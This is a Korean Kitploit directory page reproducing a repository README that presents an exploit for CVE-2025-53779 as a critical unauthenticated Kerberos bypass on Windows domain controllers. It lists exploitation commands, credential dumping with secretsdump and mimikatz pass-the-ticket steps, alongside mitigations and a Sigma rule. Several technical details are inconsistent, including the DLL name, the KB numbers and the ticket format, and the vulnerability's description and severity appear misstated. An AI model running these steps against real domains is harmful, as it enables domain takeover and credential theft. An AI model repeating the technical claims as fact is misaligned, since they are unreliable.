Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-53779-kerberos_bypass_reproduction — Reproduction of cve-2025-53779-kerberos_bypass_reproduction | Kitploit
도구/GitHubGitHub/razureink/cve-2025-53779-kerberos_bypass_reproduction
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationCTFPenetration TestingAuthenticationLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubrazureink/cve-2025-53779-kerberos_bypass_reproduction

cve-2025-53779-kerberos_bypass_reproduction

Reproduction of cve-2025-53779-kerberos_bypass_reproduction

저장소 보기
127일 전아직 검토되지 않음

CVE-2025-53779: Microsoft Windows Kerberos 인증 우회

CVSS 점수: 9.8(치명적)
상태: 실제 환경에서 활발한 악용 중
공개: Microsoft 2025년 8월 패치 화요일(제로데이)


개요

CVE-2025-53779는 Microsoft Windows Kerberos 프로토콜 구현에서 발생하는 치명적인 인증 우회 취약점입니다. 인증되지 않은 공격자는 유효한 자격 증명이나 암호화 자료를 보유하지 않고도 이 결함을 악용하여 Kerberos 인증을 완전히 우회하고 도메인 관리자를 포함한 모든 도메인 사용자를 가장할 수 있습니다.

Microsoft는 낮은 공격 복잡성, 요구되는 권한 없음, 사용자 상호 작용 불필요, 그리고 도메인 가입 시스템의 완전한 손상 가능성으로 인해 이 취약점에 CVSS 9.8(치명적) 등급을 부여했습니다.


기술 세부 정보

근본 원인

이 취약점은 Windows 도메인 컨트롤러의 Kerberos 키 배포 센터(KDC) 서비스(kdsvc.dll)에 존재합니다. 구체적으로, 권한 특성 인증서(PAC) 검증 루틴의 검증 로직 오류로 인해 공격자가 표준 인증 검사를 우회하는 AS-REQ 또는 TGS-REQ 메시지를 구성할 수 있습니다.

영향을 받는 구성 요소

  • 구성 요소: Kerberos 키 배포 센터(KDC)
  • 바이너리: kdsvc.dll
  • 프로토콜: Kerberos v5(RFC 4120)
  • 취약점 유형: PAC 검증 로직 결함을 통한 인증 우회

공격 벡터

Kerberos 메시지 본문에 특정 플래그가 설정되면 KDC는 PAC 구조의 pac-signature-data 필드를 제대로 검증하지 못합니다. 조작된 PA-PAC-REQUEST padata 유형과 위조된 인증 데이터 항목이 포함된 특수하게 제작된 AS-REQ를 전송함으로써, 공격자는 해당 장기 키 없이도 임의의 사용자 주체 이름(UPN)에 대한 티켓 부여 티켓(TGT)을 발급하도록 KDC를 속입니다.

이 공격은 사전 인증을 우회하며(REQUIRES_PRE_AUTH 플래그가 사실상 무시됨) PAC 검증을 완전히 건너뛰므로, 생성된 티켓에 임의의 그룹 구성원 자격(예: Domain Admins, Enterprise Admins)이 포함될 수 있습니다.

영향

  • 완전한 인증 우회: 유효한 Kerberos TGT를 획득하는 데 자격 증명이 필요 없음
  • 권한 상승: 도메인 관리자를 포함한 모든 도메인 사용자를 가장할 수 있음
  • 수평 이동: TGT를 획득하면 공격자는 모든 리소스에 대한 서비스 티켓을 요청할 수 있음
  • 지속성: 골든/실버 티켓 방식의 공격이 손쉬워짐
  • 전체 도메인 손상: 공격자는 인증되지 않은 상태에서 사실상 도메인 관리자 권한을 획득함

영향을 받는 버전

2025년 8월 보안 업데이트 이전의 지원되는 모든 Windows Server 버전이 영향을 받습니다:

참고: Windows 클라이언트 버전(Windows 10, Windows 11)은 KDC 서비스를 실행하지 않으므로 영향을 받지 않습니다.


재현 단계

사전 요구 사항

  1. 패치되지 않은 Windows Server 버전을 실행 중인 Windows 도메인 컨트롤러(위의 영향을 받는 버전 참조)
  2. 도메인 컨트롤러에 대한 네트워크 액세스(포트 88/TCP 및/또는 88/UDP가 열려 있어야 함)
  3. impacket 라이브러리가 설치된 Python 3.8+
  4. 이 PoC 스크립트(exploit.py)

1단계: 종속성 설치

root@kitploit:~
pip install impacket pycryptodome

또는 제공된 requirements.txt 사용:

root@kitploit:~
pip install -r requirements.txt

2단계: 대상 도메인 컨트롤러 식별

Nmap을 사용하여 Kerberos 서비스를 발견합니다:

root@kitploit:~
nmap -sU -p 88 --script krb5-enum-users <target-ip>

또는 내장된 Kerberos 스캐닝을 사용합니다:

root@kitploit:~
python exploit.py --scan <target-ip>

3단계: 도메인 사용자 열거(선택 사항)

도메인 사용자를 모르는 경우 Kerberos AS-REP roasting 또는 LDAP를 통해 열거합니다:

root@kitploit:~
python exploit.py --enum <target-ip> <domain>

4단계: 익스플로잇 실행

대상 사용자에 대한 위조 TGT를 생성합니다:

root@kitploit:~
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>

예시:

root@kitploit:~
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator

5단계: 티켓 검증

익스플로잇은 Kirbi 형식의 티켓 파일을 출력합니다. Impacket 도구를 사용하여 검증합니다:

root@kitploit:~
# Export the ticket
set KRB5CCNAME=ticket.kirbi

# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>

6단계: 사후 악용

유효한 TGT를 획득한 후에는 다음을 수행할 수 있습니다:

  • 해시 덤프: secretsdump.py -k -no-pass domain/Administrator@<dc>
  • PTT(Pass-the-Ticket): mimikatz "kerberos::ptt ticket.kirbi"
  • 골든 티켓: 동일한 기법으로 모든 사용자에 대한 티켓을 생성할 수 있음
  • 실버 티켓: 특정 서비스(CIFS, HTTP, LDAP)에 대한 서비스 티켓 요청

PoC(개념 증명)

동봉된 exploit.py는 다음과 같은 공격 흐름을 구현합니다:

  1. AS-REQ 구성: 위조된 PA-PAC-REQUEST 필드와 조작된 인증 데이터가 포함된 수정된 AS-REQ 메시지 구축
  2. PAC 우회: kdsvc.dll의 취약한 코드 경로를 트리거하는 특정 비트 플래그를 요청 본문에 설정
  3. TGT 추출: KDC 응답을 파싱하여 위조된 TGT 추출
  4. 티켓 출력: Impacket, Mimikatz 또는 기타 도구에서 사용할 수 있도록 TGT를 Kirbi 파일로 저장

상세 공격 흐름

root@kitploit:~
Attacker                         Domain Controller (KDC)
   |                                      |
   |  AS-REQ (forged PA-PAC-REQUEST)      |
   |  - cname: Administrator              |
   |  - sname: krbtgt/DOMAIN              |
   |  - padata: PA-PAC-REQUEST +          |
   |    forged auth-data                  |
   |------------------------------------->|
   |                                      |
   |  [Vulnerable Path]                   |
   |  1. KDC receives AS-REQ             |
   |  2. Checks PA-PAC-REQUEST flag      |
   |  3. **Bypasses pre-auth check**     |
   |  4. Skips PAC verification          |
   |  5. Generates TGT with arbitrary    |
   |     groups via auth-data            |
   |                                      |
   |  AS-REP (forged TGT)                 |
   |  - Encrypted with krbtgt key        |
   |  - Contains forged PAC              |
   |<-------------------------------------|
   |                                      |
   |  TGS-REQ (use forged TGT)           |
   |  - Request service ticket           |
   |  - For any service (CIFS, LDAP,     |
   |    HTTP, HOST)                       |
   |------------------------------------->|
   |                                      |
   |  TGS-REP (service ticket)           |
   |  - Legitimate service ticket        |
   |  - Attacker can now access          |
   |    any resource                     |
   |<-------------------------------------|

완화 방안

즉시 조치

  1. Microsoft 2025년 8월 패치 화요일 업데이트 적용 — 이것이 주요 수정 사항입니다. 해당 KB는 위의 영향을 받는 버전 표를 참조하십시오.

  2. 악용 시도 모니터링:

    • 이벤트 ID 4768(Kerberos 인증 티켓 발급) — 잘못되었거나 비정상적인 TGT 요청 확인
    • 이벤트 ID 4769(Kerberos 서비스 티켓 요청) — 비정상적인 서비스 티켓 패턴 확인
    • 알 수 없는 소스의 포트 88에서 발생하는 예기치 않은 Kerberos 트래픽
  3. 네트워크 세분화:

    • 도메인 컨트롤러에 대한 포트 88/TCP-UDP 액세스 제한
    • 방화벽을 사용하여 Kerberos 트래픽을 승인된 서브넷으로만 제한
  4. 추가 로깅 활성화:

    • Kerberos 로깅 활성화(NetworkProvider\Kerberos\Operational)
    • PAC 검증 감사 로깅 활성화
    • 잘못된 PAC 서명 모니터링

탐지 규칙

Sigma 규칙(사전 인증 없는 AS-REQ):

root@kitploit:~
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4768
    PreAuthenticationType: 0  # No pre-authentication required
  condition: selection
  falsepositives:
    - Users with "Do not require Kerberos preauthentication" set

해결 방법(패치를 적용할 수 없는 경우)

  • Kerberos PAC 검증 우회 차단: 패치 적용 전에는 공식적인 해결 방법이 없지만, 조직은 다음을 수행할 수 있습니다:
    • 도메인 컨트롤러에 대한 네트워크 액세스 제한(포트 88)
    • 애플리케이션에서 확장 인증 보호(EPA) 활성화
    • 잘못된 형식의 AS-REQ 메시지를 탐지하는 네트워크 침입 탐지 시스템(NIDS) 규칙 배포

참고 자료

  1. Microsoft 보안 대응 센터 - CVE-2025-53779
  2. Microsoft 2025년 8월 패치 화요일 릴리스 정보
  3. Microsoft 보안 업데이트 가이드
  4. MITRE ATT&CK - 대체 인증 자료 사용: Pass the Ticket(T1550.003)
  5. Impacket - Kerberos 상호 작용을 위한 Python 라이브러리
  6. Kerberos 프로토콜 확장(RFC 4120)
  7. MS-KILE: Kerberos 프로토콜 확장
  8. MS-PAC: 권한 특성 인증서 데이터 구조

면책 조항

이 저장소는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템에 대해 CVE-2025-53779를 무단으로 악용하는 것은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.


라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.

도구 다운로드
Windows 버전영향 여부수정 업데이트
Windows Server 2025✅ 예KB5044289
Windows Server 2022✅ 예KB5044285
Windows Server 2019✅ 예KB5044277
Windows Server 2016✅ 예KB5044293
Windows Server 2012 R2✅ 예KB5044297
Windows Server 2012✅ 예KB5044291
Windows Server 2008 R2 (ESU)✅ 예KB5044301
Windows Server 2008 (ESU)✅ 예KB5044303